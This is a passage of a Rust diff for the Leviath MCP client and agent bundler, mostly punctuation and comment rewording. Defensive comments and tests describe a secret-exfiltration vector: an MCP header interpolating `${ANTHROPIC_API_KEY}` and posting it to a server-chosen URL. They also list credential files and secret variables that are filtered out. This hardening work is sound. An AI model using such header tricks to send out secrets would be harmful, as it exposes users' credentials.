+    /// leaves the user logged out of that one server - not with a fabricated
     /// empty grant, and not with the whole load failing.
     #[test]
     fn an_indexed_server_with_no_stored_credential_is_skipped() {
@@ -609,7 +609,7 @@ mod tests {
     #[test]
     fn loading_an_unreadable_path_errors() {
         // A directory exists at the path, so `exists()` is true but reading it
-        // as a file fails — the read-error arm, distinct from a missing file.
+        // as a file fails - the read-error arm, distinct from a missing file.
         let dir = tempfile::tempdir().unwrap();
         let as_dir = dir.path().join("store-is-a-dir");
         std::fs::create_dir(&as_dir).unwrap();
@@ -638,7 +638,7 @@ mod tests {
     #[test]
     fn saving_under_a_non_directory_parent_errors() {
         // The parent path is a *file*, so create_dir_all can't make it a
-        // directory — reaching the directory-creation error arm.
+        // directory - reaching the directory-creation error arm.
         let dir = tempfile::tempdir().unwrap();
         let blocker = dir.path().join("blocker");
         std::fs::write(&blocker, b"i am a file").unwrap();
@@ -663,7 +663,7 @@ mod tests {
     }
 
     /// Access *and refresh* tokens for every MCP server. Written with the mode
-    /// already applied, so there is no window — however brief — where another
+    /// already applied, so there is no window - however brief - where another
     /// local user could read them. The previous `fs::write` + `chmod` left the
     /// file at the umask default (typically 0644) in between, on every save.
     #[cfg(unix)]
@@ -688,13 +688,13 @@ mod tests {
 
     // ─── default_path / LEVIATH_HOME ──────────────────────────────────────
 
-    /// `LEVIATH_HOME` names the *home*, and `.leviath` is appended — the same
+    /// `LEVIATH_HOME` names the *home*, and `.leviath` is appended - the same
     /// reading the CLI's config, runs dir, agents dir and control socket use.
     ///
     /// This asserted `<LEVIATH_HOME>/mcp-auth.json` before, because this module
     /// carried its own copy of the resolver that treated the override as the
-    /// `.leviath` directory itself. With the override set — which is how every
-    /// test and every sandboxed run works — the OAuth token store therefore sat
+    /// `.leviath` directory itself. With the override set - which is how every
+    /// test and every sandboxed run works - the OAuth token store therefore sat
     /// in a different directory from the config naming those very servers.
     #[test]
     fn default_path_honors_leviath_home() {

--- a/crates/leviath-mcp/src/auth/store.rs
+++ b/crates/leviath-mcp/src/auth/store.rs
@@ -269,12 +269,12 @@ fn create_parent_dir(path: &Path) -> anyhow::Result<()> {
 
 /// Leviath's data root, from the shared resolver.
 ///
-/// This used to be a local copy that read `LEVIATH_HOME` as the `.leviath`
-/// directory *itself*, while the CLI reads it as the user home and appends
-/// `.leviath`. With the override set - which is how every test and every
-/// sandboxed run works - the OAuth token store therefore landed in a different
-/// directory from the config naming those very servers. The default
-/// (`~/.leviath/mcp-auth.json`) is unchanged.
+/// The shared resolver reads `LEVIATH_HOME` as the user home and appends
+/// `.leviath`, exactly as the CLI does. A local copy that treats the override
+/// as the `.leviath` directory *itself* lands the OAuth token store in a
+/// different directory from the config naming those very servers - and the
+/// override being set is how every test and every sandboxed run works. The
+/// default resolves to `~/.leviath/mcp-auth.json`.
 fn leviath_home() -> Option<PathBuf> {
     leviath_core::data_dir()
 }
@@ -691,11 +691,11 @@ mod tests {
     /// `LEVIATH_HOME` names the *home*, and `.leviath` is appended - the same
     /// reading the CLI's config, runs dir, agents dir and control socket use.
     ///
-    /// This asserted `<LEVIATH_HOME>/mcp-auth.json` before, because this module
-    /// carried its own copy of the resolver that treated the override as the
-    /// `.leviath` directory itself. With the override set - which is how every
-    /// test and every sandboxed run works - the OAuth token store therefore sat
-    /// in a different directory from the config naming those very servers.
+    /// A private copy of the resolver that treats the override as the
+    /// `.leviath` directory itself resolves `<LEVIATH_HOME>/mcp-auth.json`
+    /// instead. With the override set - which is how every test and every
+    /// sandboxed run works - the OAuth token store then sits in a different
+    /// directory from the config naming those very servers.
     #[test]
     fn default_path_honors_leviath_home() {
         temp_env::with_var("LEVIATH_HOME", Some("/tmp/lev-home-test"), || {

--- a/crates/leviath-mcp/src/client.rs
+++ b/crates/leviath-mcp/src/client.rs
@@ -1,7 +1,7 @@
 //! MCP client: the protocol layer, over any transport.
 //!
 //! Framing and connection lifecycle live in [`crate::transport`]; this module
-//! owns the MCP conversation itself — the handshake, tool discovery, tool
+//! owns the MCP conversation itself - the handshake, tool discovery, tool
 //! calls, and the wire types they exchange.
 
 use serde::{Deserialize, Serialize};
@@ -84,7 +84,7 @@ pub struct EmbeddedResource {
 /// Content item in a tool result.
 ///
 /// Every wire field name here is the spec's camelCase spelling (`mimeType`),
-/// not a Rust-style snake_case one — mismatches made whole tool results fail to
+/// not a Rust-style snake_case one - mismatches made whole tool results fail to
 /// deserialize.
 #[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
 #[serde(tag = "type")]
@@ -123,7 +123,7 @@ pub enum ToolResultContent {
     /// Any content block this client does not model.
     ///
     /// Internally-tagged enums can't carry the original payload in a catch-all
-    /// arm, so the block's data is dropped — but that is the point: without
+    /// arm, so the block's data is dropped - but that is the point: without
     /// this variant a single unrecognized block (a future content type, or a
     /// vendor extension) fails the *entire* tool result. Callers skip these and
     /// warn.
@@ -133,8 +133,8 @@ pub enum ToolResultContent {
 /// MCP protocol revisions this client understands, newest first.
 ///
 /// The client offers the newest and adopts whatever the server echoes back.
-/// Pinning a single old revision — as this used to, with `2024-11-05`
-/// hardcoded — locks every connection to the oldest dialect and, on HTTP,
+/// Pinning a single old revision - as this used to, with `2024-11-05`
+/// hardcoded - locks every connection to the oldest dialect and, on HTTP,
 /// actively misdeclares the connection: the streamable transport postdates
 /// that revision entirely.
 pub const SUPPORTED_PROTOCOL_VERSIONS: &[&str] =
@@ -207,7 +207,7 @@ impl MCPClient {
     /// Build a client for a configured server, over whichever transport the
     /// entry describes.
     ///
-    /// Callers above this point — discovery, execution, the tool registry —
+    /// Callers above this point - discovery, execution, the tool registry -
     /// never learn which one it turned out to be.
     pub async fn from_config(config: &MCPServerConfig) -> anyhow::Result<Self> {
         Self::from_config_with_auth(config, None, &[]).await
@@ -315,7 +315,7 @@ impl MCPClient {
                 tracing::warn!(
                     pages = MAX_TOOL_PAGES,
                     "MCP server still returned a tools/list cursor at the page \
-                     limit — stopping; some tools may be missing"
+                     limit - stopping; some tools may be missing"
                 );
             }
         }
@@ -411,14 +411,14 @@ fn negotiated_version(echoed: Option<&Value>) -> String {
             if !SUPPORTED_PROTOCOL_VERSIONS.contains(&version) {
                 tracing::warn!(
                     version = %version,
-                    "MCP server negotiated an unrecognized protocol revision — continuing"
+                    "MCP server negotiated an unrecognized protocol revision - continuing"
                 );
             }
             version.to_string()
         }
         None => {
             // Servers predating version negotiation omit the field.
-            tracing::debug!("MCP server echoed no protocolVersion — assuming the offered one");
+            tracing::debug!("MCP server echoed no protocolVersion - assuming the offered one");
             PREFERRED_PROTOCOL_VERSION.to_string()
         }
     }
@@ -469,7 +469,7 @@ mod tests {
         };
         let json = serde_json::to_string(&result).unwrap();
         assert!(json.contains("Hello"));
-        // Wire name is `isError`, not `is_error` — a mismatch here meant every
+        // Wire name is `isError`, not `is_error` - a mismatch here meant every
         // failing tool call deserialized as a success.
         assert!(json.contains("\"isError\":false"), "got: {json}");
         assert!(!json.contains("is_error"), "got: {json}");
@@ -1019,7 +1019,7 @@ for line in sys.stdin:
     // ─── send_request/send_notification: real write/flush I/O errors ───────
     //
     // `writer` is a `BufWriter`, so a small `write_all` just appends to its
-    // in-memory buffer without touching the OS -- the *real* write only
+    // in-memory buffer without touching the OS - the *real* write only
     // happens on `flush()`, which is where a broken pipe actually surfaces.
     // Killing and reaping the child first guarantees the pipe's read end is
     // gone, so these are deterministic, not racy. A payload large enough to
@@ -1343,8 +1343,8 @@ for line in sys.stdin:
 
     #[test]
     fn unknown_content_type_degrades_instead_of_failing_the_result() {
-        // Without the catch-all arm a single unrecognized block — a future
-        // content type or a vendor extension — makes the *whole* tool result
+        // Without the catch-all arm a single unrecognized block - a future
+        // content type or a vendor extension - makes the *whole* tool result
         // fail to parse, taking the usable blocks down with it.
         let json = r#"{"content":[
             {"type":"text","text":"keep me"},

--- a/crates/leviath-mcp/src/client.rs
+++ b/crates/leviath-mcp/src/client.rs
@@ -1193,10 +1193,10 @@ for line in sys.stdin:
 
     // ─── Spec wire-format conformance ─────────────────────────────────────
     //
-    // Each test here pins a field name or shape that the client previously got
-    // wrong. The failures they guard against were mostly *silent* (a tool error
-    // read as success) or total (one unrecognized block failing an entire
-    // result), which is what made real servers appear not to work.
+    // Each test here pins a field name or shape that is easy to get wrong on
+    // the wire. The failures they guard against are mostly *silent* (a tool
+    // error read as success) or total (one unrecognized block failing an
+    // entire result), which is what makes real servers appear not to work.
 
     #[test]
     fn tool_result_reads_is_error_from_camel_case_wire_name() {
@@ -1212,8 +1212,8 @@ for line in sys.stdin:
     #[test]
     fn tool_result_snake_case_is_error_is_not_honored() {
         // Guards the inverse mistake: `is_error` is *not* a wire name, so a
-        // payload using it must fall back to the default rather than silently
-        // re-introducing the old behavior.
+        // payload using it must fall back to the default rather than being
+        // silently honored as the error flag.
         let json = r#"{"content":[],"is_error":true}"#;
         let result: ToolResult = serde_json::from_str(json).unwrap();
         assert!(!result.is_error);

--- a/crates/leviath-mcp/src/discovery.rs
+++ b/crates/leviath-mcp/src/discovery.rs
@@ -22,7 +22,7 @@ pub struct ToolMetadata {
     pub schema: serde_json::Value,
 }
 
-/// `{"type": "object"}` — the fallback parameter schema for a tool whose
+/// `{"type": "object"}` - the fallback parameter schema for a tool whose
 /// server omitted `inputSchema`.
 fn empty_object_schema() -> serde_json::Value {
     serde_json::json!({"type": "object"})
@@ -123,7 +123,7 @@ impl MCPServerConfig {
     /// Decide which transport this entry describes, rejecting ambiguity.
     ///
     /// With `transport` omitted the choice is inferred from whichever of
-    /// `command`/`url` is present — but only when exactly one is. Guessing
+    /// `command`/`url` is present - but only when exactly one is. Guessing
     /// when both or neither are set would silently connect somewhere the user
     /// did not intend, so those are errors.
     pub fn resolve(&self) -> anyhow::Result<ResolvedTransport<'_>> {
@@ -162,7 +162,7 @@ impl MCPServerConfig {
 
     /// Validate this entry, discarding the resolved value.
     ///
-    /// For callers that only want to know whether the config is usable — a
+    /// For callers that only want to know whether the config is usable - a
     /// broken entry should be caught when the config loads, not at the first
     /// tool call.
     pub fn validate(&self) -> anyhow::Result<()> {

--- a/crates/leviath-mcp/src/execution.rs
+++ b/crates/leviath-mcp/src/execution.rs
@@ -494,7 +494,7 @@ mod tests {
     //
     // Same Python-backed JSON-RPC stub approach used in client.rs/discovery.rs
     // tests. Note: MCPClient::shutdown() always returns Ok(()) by design (it
-    // swallows failures so a dead server can't block cleanup) — so
+    // swallows failures so a dead server can't block cleanup) - so
     // shutdown_all()'s error-collection branch is intentionally left
     // uncovered here; there's no way to make client.shutdown() fail without
     // changing that documented "always succeeds" behavior.

--- a/crates/leviath-mcp/src/lib.rs
+++ b/crates/leviath-mcp/src/lib.rs
@@ -6,7 +6,7 @@
 //! standardizing tool interfaces across different implementations.
 //!
 //! Tool servers are reached over JSON-RPC 2.0, carried by one of the transports
-//! in [`transport`] — stdio to a spawned child process, or HTTP to a remote
+//! in [`transport`] - stdio to a spawned child process, or HTTP to a remote
 //! server. Everything above the transport layer is identical either way.
 
 pub mod auth;

--- a/crates/leviath-mcp/src/transport/http.rs
+++ b/crates/leviath-mcp/src/transport/http.rs
@@ -80,13 +80,13 @@ pub(crate) fn expand_env(value: &str) -> String {
 /// A credential-shaped variable is refused unless the user named it, exactly as
 /// a Rhai script tool's `env_var` is. Without this the two transports disagreed:
 /// a stdio server got a filtered environment, while an HTTP server's `headers`
-/// could interpolate *any* variable the daemon held —
+/// could interpolate *any* variable the daemon held -
 ///
 /// ```toml
 /// headers = { X-A = "${ANTHROPIC_API_KEY}" }
 /// ```
-///
-/// — and post it to whatever URL the same entry named. Anyone who could write an
+/// -
+/// and post it to whatever URL the same entry named. Anyone who could write an
 /// MCP server entry could exfiltrate every secret in the daemon's environment on
 /// the next connect.
 /// The value of `name`, or `None` if it is unset or credential-shaped and not
@@ -101,7 +101,7 @@ fn resolve_var(name: &str, allowlist: &[String]) -> Option<String> {
 #[expect(
     clippy::string_slice,
     reason = "`start` and `end` are `find` hits, offset only by the lengths of the ASCII literals \
-              `${` and `}` — all char boundaries"
+              `${` and `}` - all char boundaries"
 )]
 pub(crate) fn expand_env_allowing(value: &str, allowlist: &[String]) -> String {
     let mut out = String::with_capacity(value.len());
@@ -125,7 +125,7 @@ pub(crate) fn expand_env_allowing(value: &str, allowlist: &[String]) -> String {
                 rest = &after[end + 1..];
             }
             None => {
-                // Unterminated `${` — emit it literally rather than eating the
+                // Unterminated `${` - emit it literally rather than eating the
                 // rest of the value.
                 out.push_str(&rest[start..]);
                 return out;
@@ -170,7 +170,7 @@ enum Mode {
 /// A message decoded from the legacy event stream.
 ///
 /// The `endpoint` event carries a URL rather than a JSON-RPC frame, so it is a
-/// distinct variant instead of a `Value` the reader has to re-inspect — which
+/// distinct variant instead of a `Value` the reader has to re-inspect - which
 /// would leave an arm that can never be taken.
 enum LegacyEvent {
     /// The `endpoint` event, naming where to POST.
@@ -250,7 +250,7 @@ impl HttpTransport {
         let Some(refresher) = self.refresher.clone() else {
             return Ok(response);
         };
-        tracing::info!("MCP request returned 401 — refreshing the token and retrying");
+        tracing::info!("MCP request returned 401 - refreshing the token and retrying");
         let value = refresher.refresh().await?;
         self.set_auth_header(&value);
         self.post(body).await
@@ -459,7 +459,7 @@ impl HttpTransport {
 
         // The endpoint event is the first thing a legacy server sends; without
         // it there is nowhere to POST. Any frame arriving ahead of it is
-        // discarded — there is no request outstanding for it to answer.
+        // discarded - there is no request outstanding for it to answer.
         let endpoint = loop {
             match rx.recv().await {
                 Some(LegacyEvent::Endpoint(path)) => break path,
@@ -728,7 +728,7 @@ mod tests {
         });
     }
 
-    /// A credential-shaped variable is refused unless the user named it — the
+    /// A credential-shaped variable is refused unless the user named it - the
     /// same rule a Rhai script tool's `env_var` follows. Without it, an MCP
     /// server entry could set `X-A = "${ANTHROPIC_API_KEY}"` against a URL of
     /// its own choosing and post every secret the daemon holds.
@@ -1061,7 +1061,7 @@ mod tests {
     // ─── legacy HTTP+SSE fallback ─────────────────────────────────────────
 
     /// A legacy-only server: `GET /sse` streams events, `POST /messages`
-    /// accepts requests, and `POST /sse` is rejected with 405 — which is how
+    /// accepts requests, and `POST /sse` is rejected with 405 - which is how
     /// the client learns to fall back.
     fn legacy_app(
         endpoint_event: &'static str,
@@ -1584,7 +1584,7 @@ mod tests {
         }));
         let url = format!("{}/sse", serve(app).await);
         let mut t = transport(&url);
-        // The stream then ends, so the request itself fails — but only after
+        // The stream then ends, so the request itself fails - but only after
         // the endpoint was found, which is what this pins.
         let err = t
             .send_request(&init(), DEFAULT_REQUEST_TIMEOUT)
@@ -1935,7 +1935,7 @@ mod tests {
     async fn a_legacy_post_to_a_dead_endpoint_errors() {
         let _guard = always_on_tracing_guard();
         // The endpoint event names an absolute URL on a closed port, so the
-        // stream opens but the follow-up POST fails at the network level —
+        // stream opens but the follow-up POST fails at the network level -
         // reaching the `post()?` arm inside legacy_request.
         let app = Router::new().route(
             "/sse",

--- a/crates/leviath-mcp/src/transport/jsonrpc.rs
+++ b/crates/leviath-mcp/src/transport/jsonrpc.rs
@@ -91,9 +91,9 @@ impl JsonRpcResponse {
 /// What an inbound frame is, from the client's point of view.
 ///
 /// The transports read a single stream that carries three different things.
-/// Treating every frame as "the response to my last request" - as this client
-/// used to - means a server that pings us, or asks us for its roots, corrupts
-/// the request/response pairing or blocks waiting for a reply that never comes.
+/// Treating every frame as "the response to my last request" means a server
+/// that pings us, or asks us for its roots, corrupts the request/response
+/// pairing or blocks waiting for a reply that never comes.
 pub(crate) enum Inbound {
     /// A response to a request we sent.
     Response(Box<JsonRpcResponse>),

--- a/crates/leviath-mcp/src/transport/jsonrpc.rs
+++ b/crates/leviath-mcp/src/transport/jsonrpc.rs
@@ -91,8 +91,8 @@ impl JsonRpcResponse {
 /// What an inbound frame is, from the client's point of view.
 ///
 /// The transports read a single stream that carries three different things.
-/// Treating every frame as "the response to my last request" — as this client
-/// used to — means a server that pings us, or asks us for its roots, corrupts
+/// Treating every frame as "the response to my last request" - as this client
+/// used to - means a server that pings us, or asks us for its roots, corrupts
 /// the request/response pairing or blocks waiting for a reply that never comes.
 pub(crate) enum Inbound {
     /// A response to a request we sent.
@@ -133,8 +133,8 @@ pub(crate) fn classify(frame: Value) -> anyhow::Result<Inbound> {
 /// Build the reply to a server-initiated request.
 ///
 /// `ping` is answered with an empty result (it exists purely as a liveness
-/// check). Everything else — `roots/list`, `sampling/createMessage`,
-/// `elicitation/create` — gets a well-formed "method not found" rather than
+/// check). Everything else - `roots/list`, `sampling/createMessage`,
+/// `elicitation/create` - gets a well-formed "method not found" rather than
 /// silence, so a server that waits on the reply makes progress instead of
 /// stalling the connection.
 pub(crate) fn reply_to_server_request(id: &Value, method: &str) -> Value {
@@ -256,7 +256,7 @@ mod tests {
 
     #[test]
     fn classify_rejects_a_malformed_response() {
-        // No `method`, so it must be a response — but it isn't shaped like one.
+        // No `method`, so it must be a response - but it isn't shaped like one.
         let err = classify(serde_json::json!([1, 2, 3]))
             .err()
             .expect("array is not a response");

--- a/crates/leviath-mcp/src/transport/mod.rs
+++ b/crates/leviath-mcp/src/transport/mod.rs
@@ -34,8 +34,7 @@ pub trait BearerRefresher: Send + Sync {
 ///
 /// Generous, because a legitimate tool call can be genuinely slow (a build, a
 /// network fetch). The point is only that "slow" can never become "forever" -
-/// an unbounded read is how a silent server used to wedge the caller
-/// permanently.
+/// an unbounded read lets a silent server wedge the caller permanently.
 pub const DEFAULT_REQUEST_TIMEOUT: Duration = Duration::from_secs(120);
 
 /// How long to wait for the initial `initialize` handshake.

--- a/crates/leviath-mcp/src/transport/mod.rs
+++ b/crates/leviath-mcp/src/transport/mod.rs
@@ -2,7 +2,7 @@
 //!
 //! MCP defines more than one way to carry the same JSON-RPC conversation:
 //! stdio to a child process, and HTTP to a (usually remote) server. Everything
-//! above this module — [`crate::MCPClient`], discovery, execution — is written
+//! above this module - [`crate::MCPClient`], discovery, execution - is written
 //! against the crate-internal `Transport` trait and never learns which one it
 //! is talking over.
 
@@ -33,7 +33,7 @@ pub trait BearerRefresher: Send + Sync {
 /// How long to wait for a server to answer a request before giving up.
 ///
 /// Generous, because a legitimate tool call can be genuinely slow (a build, a
-/// network fetch). The point is only that "slow" can never become "forever" —
+/// network fetch). The point is only that "slow" can never become "forever" -
 /// an unbounded read is how a silent server used to wedge the caller
 /// permanently.
 pub const DEFAULT_REQUEST_TIMEOUT: Duration = Duration::from_secs(120);
@@ -68,7 +68,7 @@ pub(crate) trait Transport: Send {
 
     /// Attach a refresher used to re-authenticate on a mid-session `401`.
     ///
-    /// The default is a no-op — only the HTTP transport can re-auth; stdio has
+    /// The default is a no-op - only the HTTP transport can re-auth; stdio has
     /// no bearer to refresh.
     fn set_bearer_refresher(&mut self, _refresher: Arc<dyn BearerRefresher>) {}
 }

--- a/crates/leviath-mcp/src/transport/stdio.rs
+++ b/crates/leviath-mcp/src/transport/stdio.rs
@@ -52,7 +52,7 @@ impl StderrTail {
 ///
 /// On Windows the npm-family launchers (`npx`, `npm`, `yarn`, `pnpm`) exist
 /// only as `.cmd` shims, and `CreateProcess` will not find them from the bare
-/// name — so `command = "npx"`, far and away the most common MCP server config
+/// name - so `command = "npx"`, far and away the most common MCP server config
 /// in the wild, simply fails to spawn there. Trying the executable suffixes
 /// fixes that.
 ///
@@ -80,7 +80,7 @@ fn command_candidates(command: &str) -> Vec<String> {
 /// Build a clean environment for a spawned MCP server.
 ///
 /// **Allowlist, not denylist.** An MCP server is third-party code by definition,
-/// and we are choosing what to hand it — so the question is "what does it need",
+/// and we are choosing what to hand it - so the question is "what does it need",
 /// not "what must we remember to withhold". The previous substring denylist
 /// (`API_KEY`, `SECRET_KEY`, `ACCESS_TOKEN`, …) passed everything whose name
 /// happened not to match: `AWS_SECRET_ACCESS_KEY` matches neither `API_SECRET`
@@ -92,7 +92,7 @@ fn command_candidates(command: &str) -> Vec<String> {
 /// What survives is [`leviath_core::child_env_allowed`]: enough to find an
 /// interpreter and behave like a terminal program. Anything else a server
 /// legitimately needs is declared in its own `env` block in config, which the
-/// caller applies *after* this filter and which therefore always wins — that is
+/// caller applies *after* this filter and which therefore always wins - that is
 /// the supported way to give a server its token.
 pub fn filter_env(vars: &[(String, String)]) -> HashMap<String, String> {
     vars.iter()
@@ -352,8 +352,8 @@ mod tests {
 
     #[test]
     fn bare_command_gains_launcher_suffixes_on_windows() {
-        // Without `.cmd`, `command = "npx"` — the single most common MCP
-        // server config there is — fails to spawn on Windows.
+        // Without `.cmd`, `command = "npx"` - the single most common MCP
+        // server config there is - fails to spawn on Windows.
         assert_eq!(
             command_candidates_for("npx", true),
             vec!["npx", "npx.cmd", "npx.exe", "npx.bat"]
@@ -398,7 +398,7 @@ mod tests {
     fn stderr_tail_survives_a_poisoned_lock() {
         // The drain task holds this lock; if it ever panicked mid-push the
         // mutex would stay poisoned and every later diagnostic would panic
-        // too — turning a server's error message into a second failure.
+        // too - turning a server's error message into a second failure.
         let tail = StderrTail::default();
         let doomed = tail.clone();
         let _ = std::thread::spawn(move || {
@@ -550,7 +550,7 @@ mod tests {
     }
 
     /// The names the old substring denylist let through. Each of these reached
-    /// every spawned MCP server — third-party code, by definition.
+    /// every spawned MCP server - third-party code, by definition.
     #[test]
     fn filter_env_strips_what_the_old_denylist_missed() {
         let vars = [

--- a/crates/leviath-mcp/src/transport/stdio.rs
+++ b/crates/leviath-mcp/src/transport/stdio.rs
@@ -20,9 +20,9 @@ const STDERR_TAIL_LINES: usize = 20;
 
 /// A bounded, shared tail of the child's stderr.
 ///
-/// A server that fails to start writes its reason to stderr and exits. That
-/// used to go to `/dev/null`, so the user saw a bare "connection closed" and no
-/// hint of the missing package, bad flag, or absent runtime that actually
+/// A server that fails to start writes its reason to stderr and exits.
+/// Sending that to `/dev/null` leaves the user a bare "connection closed" and
+/// no hint of the missing package, bad flag, or absent runtime that actually
 /// caused it. Bounded so a chatty server can't grow this without limit.
 #[derive(Clone, Default)]
 pub(crate) struct StderrTail(Arc<Mutex<VecDeque<String>>>);
@@ -197,8 +197,8 @@ impl StdioTransport {
     /// Read one frame from the server, or `Ok(None)` at end of stream.
     async fn read_frame(&mut self) -> anyhow::Result<Option<Value>> {
         let mut line = String::new();
-        // Propagated, never unwrapped: this used to `.expect()`, so a server
-        // dying mid-read panicked the whole daemon rather than failing one call.
+        // Propagated, never unwrapped: an `.expect()` here turns a server dying
+        // mid-read into a whole-daemon panic rather than one failed call.
         // `read_line` also fails outright on non-UTF-8 output, which a server
         // writing raw bytes or a mis-encoded log line really does produce.
         let read = self
@@ -549,7 +549,7 @@ mod tests {
         assert!(!filtered.contains_key("SAFE_VAR"));
     }
 
-    /// The names the old substring denylist let through. Each of these reached
+    /// Names a substring denylist lets through. Each of these would reach
     /// every spawned MCP server - third-party code, by definition.
     #[test]
     fn filter_env_strips_what_the_old_denylist_missed() {
@@ -730,8 +730,8 @@ for line in sys.stdin:
     #[tokio::test]
     async fn closed_connection_is_an_error_not_a_panic() {
         let _guard = always_on_tracing_guard();
-        // Regression guard: reading used to `.expect()`, so a server dying
-        // mid-request panicked the daemon rather than failing the call.
+        // Regression guard: an `.expect()` on the read turns a server dying
+        // mid-request into a daemon panic rather than a failed call.
         let script = "import sys\nsys.stdin.readline()\nsys.stdout.close()\n";
         let mut t = spawn_stub(script).await;
         let err = t

--- a/crates/leviath-package/Cargo.toml
+++ b/crates/leviath-package/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [dependencies]

--- a/crates/leviath-package/src/bundler.rs
+++ b/crates/leviath-package/src/bundler.rs
@@ -12,8 +12,8 @@ use std::path::{Path, PathBuf};
 /// The directory-read operation used while walking a project tree, injectable
 /// so tests can force the walk's `read_dir` error and recursion-propagation
 /// arms deterministically on every platform (a `chmod 0o000` subdirectory is
-/// Unix-only; the OS-agnostic failures — a missing top-level path, a
-/// mismatched `base`, an empty tar entry name — can't produce a *recursive*
+/// Unix-only; the OS-agnostic failures - a missing top-level path, a
+/// mismatched `base`, an empty tar entry name - can't produce a *recursive*
 /// read failure, because during recursion `base` is always an ancestor of the
 /// entry). It is a trait object rather than `impl Fn` so production and every
 /// test share exactly ONE monomorphization of the walk functions. Production
@@ -36,8 +36,8 @@ impl AgentBundler {
             // `.env.test`, `id_rsa`, `.netrc`, `.npmrc`, `credentials.json` and
             // `service-account.json` were all bundled and shipped.
             //
-            // Still a denylist — an allowlist would break every agent that ships
-            // an unanticipated data file — but a `.env*` prefix rule now covers
+            // Still a denylist - an allowlist would break every agent that ships
+            // an unanticipated data file - but a `.env*` prefix rule now covers
             // the whole family, and the exact-name entries are the credential
             // files that actually turn up in project directories.
             exclude_patterns: vec![
@@ -85,7 +85,7 @@ impl AgentBundler {
     ///
     /// Takes `project_path: &Path` (not `impl AsRef<Path>`) so every caller --
     /// production code and the various `&Path`/`&PathBuf`/`&&PathBuf` shapes
-    /// tests pass -- shares exactly ONE monomorphization; `&PathBuf` and
+    /// tests pass - shares exactly ONE monomorphization; `&PathBuf` and
     /// `&&PathBuf` coerce to `&Path` automatically via deref coercion at the
     /// call site, so no caller needs to change beyond that.
     pub fn bundle(&self, project_path: &Path) -> anyhow::Result<Vec<u8>> {
@@ -120,9 +120,9 @@ impl AgentBundler {
     /// Walk `project_path` and write a tar.gz archive to `sink`.
     ///
     /// Takes `sink` as `&mut dyn Write` (a trait object) rather than a
-    /// generic `W: Write` so that every caller -- the real `Vec<u8>`/file
+    /// generic `W: Write` so that every caller - the real `Vec<u8>`/file
     /// sink as well as tests injecting sinks that fail on write to exercise
-    /// the tar/gzip finalization error paths below -- shares exactly ONE
+    /// the tar/gzip finalization error paths below - shares exactly ONE
     /// monomorphization of this function (and, transitively, of
     /// `add_directory_to_tar`) instead of one per concrete sink type.
     fn write_bundle(
@@ -180,13 +180,13 @@ impl AgentBundler {
     ///
     /// Three shapes, which is all the patterns here need:
     ///
-    /// - `*.ext` — matches by extension (`server.key`).
-    /// - `prefix*` — matches by leading text (`.env*` covers `.env`,
+    /// - `*.ext` - matches by extension (`server.key`).
+    /// - `prefix*` - matches by leading text (`.env*` covers `.env`,
     ///   `.env.staging`, `.env.test`; `id_rsa*` covers `id_rsa` and
     ///   `id_rsa.pub`). Added because the exact-name-only matcher shipped
     ///   `.env.staging` while excluding `.env.production`, which is precisely
     ///   the kind of gap a hand-listed denylist accumulates.
-    /// - anything else — matched exactly.
+    /// - anything else: matched exactly.
     pub fn should_exclude(&self, filename: &str) -> bool {
         self.exclude_patterns.iter().any(|pattern| {
             if let Some(suffix) = pattern.strip_prefix("*.") {
@@ -218,7 +218,7 @@ impl AgentBundler {
             // `ReadDir::next()`'s `Err` arm surfaces OS-level directory-read
             // faults (not TOCTOU races): on both macOS and Linux, `readdir`
             // returns entry names without `stat`-ing them, so deleting a
-            // file mid-iteration doesn't make this fail -- the failure path
+            // file mid-iteration doesn't make this fail - the failure path
             // would need an actual OS/filesystem-driver-level error while
             // listing, which is unreachable in practice.
             let entry = entry.expect("read_dir should not fail during bundle");
@@ -271,7 +271,7 @@ mod tests {
 
     /// The variants the old exact-name list shipped. `.env.production` was
     /// excluded and `.env.staging` was not, which is the gap a hand-maintained
-    /// denylist accumulates — so the pattern covers the family now.
+    /// denylist accumulates - so the pattern covers the family now.
     #[test]
     fn excludes_every_env_variant_not_just_the_three_that_were_listed() {
         let bundler = AgentBundler::new();
@@ -525,7 +525,7 @@ mod tests {
         )
         .unwrap();
 
-        // Output path inside a directory that doesn't exist — fs::write must fail.
+        // Output path inside a directory that doesn't exist - fs::write must fail.
         let output = dir
             .path()
             .join("no-such-parent-dir")
@@ -635,7 +635,7 @@ mod tests {
         let dir = tempfile::tempdir().unwrap();
         let project = dir.path().join("project");
         fs::create_dir_all(&project).unwrap();
-        // No agent.leviath written -- `bundle()` must fail before ever
+        // No agent.leviath written - `bundle()` must fail before ever
         // reaching the write step, and `bundle_to_file` must propagate that
         // failure via its `?` rather than attempting to write anything.
         let output = dir.path().join("output.leviath-bundle");
@@ -664,7 +664,7 @@ mod tests {
 
         // A symlink whose target doesn't exist: `Path::is_dir`/`is_file`
         // both follow symlinks and return `false` when the target is
-        // missing, so this entry is neither -- exercising the "skip
+        // missing, so this entry is neither - exercising the "skip
         // anything that isn't a plain file or directory" branch.
         std::os::unix::fs::symlink(project.join("does-not-exist"), project.join("dangling"))
             .unwrap();
@@ -724,7 +724,7 @@ mod tests {
         tar.finish().unwrap();
         drop(tar);
 
-        // The dangling entry was skipped -- nothing was appended to the tar.
+        // The dangling entry was skipped - nothing was appended to the tar.
         let mut archive = tar::Archive::new(&sink[..]);
         assert_eq!(archive.entries().unwrap().count(), 0);
     }
@@ -737,7 +737,7 @@ mod tests {
     // enclosing `?`s in `write_bundle` and `bundle_with`. Injecting the reader
     // makes this deterministic on every platform. (During real
     // recursion `base` is always an ancestor of the entry, so no OS-agnostic
-    // path/tar failure can surface *inside* a recursion -- injection is the
+    // path/tar failure can surface *inside* a recursion - injection is the
     // only cross-platform way to reach these propagation arms.)
     #[test]
     fn test_bundle_recursive_read_dir_failure_propagates() {
@@ -886,7 +886,7 @@ mod tests {
     // Neither `tar::Builder::into_inner` nor `GzEncoder::finish` ever calls
     // `Write::flush` on the underlying sink directly (confirmed empirically:
     // a sink whose `flush` always errors but whose `write` always succeeds
-    // makes `write_bundle` succeed) -- so these `flush` impls are
+    // makes `write_bundle` succeed) - so these `flush` impls are
     // unreachable via `write_bundle` no matter how the sink is configured.
